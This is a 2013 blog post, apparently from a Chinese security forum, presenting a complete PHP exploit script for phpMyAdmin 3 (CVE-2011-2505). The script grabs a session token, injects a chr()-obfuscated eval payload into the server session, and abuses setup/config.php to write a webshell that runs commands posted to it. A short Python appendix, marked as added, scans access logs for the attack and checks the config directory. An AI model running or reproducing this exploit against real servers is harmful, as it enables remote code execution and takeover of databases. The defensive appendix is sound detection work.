phpMyAdmin3 remote code execute, PHP version exploit

Posted on 2013-2-21 09:13:03
Lately I've been a full-time stay-at-home dad, out of the loop on the scene for many months, and the blog hasn't been updated either.

Last night I was up all night with the kid and saw Hei Ge's discussion of the phpMyAdmin3 vulnerability in the php security group. Although I hadn't read the vulnerable code before, I had seen wofeiwo's exp on Weibo a while back, and according to Hei Ge there was a way to exploit it that was not "jilei" (chicken ribs, i.e. not nearly useless), so during the night I dug out the code, studied it, and wrote this reheated-leftovers exp. Since I got to it late and plenty of people had already studied it and written exps, mine counts as reheating leftovers; take it as research to kill time.

First, props to wofeiwo's Python version of the exp, and props again to the diligence of wofeiwo and superhei, a model to learn from. That earlier exp, however, had some limitations in use:
First, session.auto_start = 1;
Second, in the default pma3 code the libraries directory is already blocked from access by .htaccess.
And of course there is a third point, a gap none of us can get across: the config directory must exist and be writable.

After reading Hei Ge's remarks in the group and going over the code again, I found that the first two limitations can both be ignored. So this vulnerability really can be less of a chicken rib than it seemed.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
* working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
* Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token:$token\n";
    echo "[+] Session ID:$sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
* Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// Minimal raw HTTP/1.1 client: GET when $data is empty, POST otherwise.
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    // Read until the server closes the connection (Connection: Close above).
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    fclose($fp);
    return $resp;
}

?>
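Added example (not part of the original post, and not phpMyAdmin's own code): defender-side checks for the two things the exp above depends on, a setup script still reachable and fed `session_to_unset` / `_SESSION[...]` parameters, and a `config/` directory that exists and is writable. The install path and the access-log lines are constructed assumptions.

```python
"""Defender-side checks for the phpMyAdmin 3 setup-script issue (CVE-2011-2505)."""
import os
import re
from urllib.parse import unquote

# Request shapes the exploit relies on: a session_to_unset parameter plus an
# _SESSION[...] array key smuggled into the server-side session, followed by a
# save through setup/config.php that writes config/config.inc.php.
SESSION_INJECT = re.compile(r"(?i)(?:[?&]session_to_unset=|[?&]_SESSION\[)")
SETUP_SAVE = re.compile(r"(?i)\"POST [^ ]*/setup/config\.php")


def scan_access_log(lines):
    """Return [(line_no, reason)] for lines matching the exploit's request pattern."""
    hits = []
    for n, line in enumerate(lines, 1):
        decoded = unquote(line)  # %5B -> [ so encoded and plain forms both match
        if SESSION_INJECT.search(decoded):
            hits.append((n, "session-key injection via session_to_unset/_SESSION[...]"))
        elif SETUP_SAVE.search(decoded):
            hits.append((n, "setup/config.php save: setup/ should not be reachable after install"))
    return hits


def config_dir_risk(pma_root):
    """Classify <pma_root>/config, the exploit's precondition (exists and writable)."""
    cfg = os.path.join(pma_root, "config")
    if not os.path.isdir(cfg):
        return "ok"      # nothing for setup/config.php to write into
    if os.access(cfg, os.W_OK):  # run as the web server user for a meaningful answer
        return "risk"    # config/ exists and is writable: remove it once setup is done
    return "warn"        # present but read-only; still worth removing


# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/index.php HTTP/1.1" 200 5120 "-" "x"',
    '10.0.0.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/db_create.php?token=abc'
    '&session_to_unset=x&_SESSION%5BConfigFile%5D%5BServers%5D%5B1%5D%5Bhost%5D=h'
    ' HTTP/1.1" 200 312 "-" "x"',
    '10.0.0.5 - - [21/Feb/2013:09:13:05 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 88 "-" "x"',
]

if __name__ == "__main__":
    for n, why in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {why}")
    print("config/ status:", config_dir_risk("/var/www/pma"))  # assumed install path
```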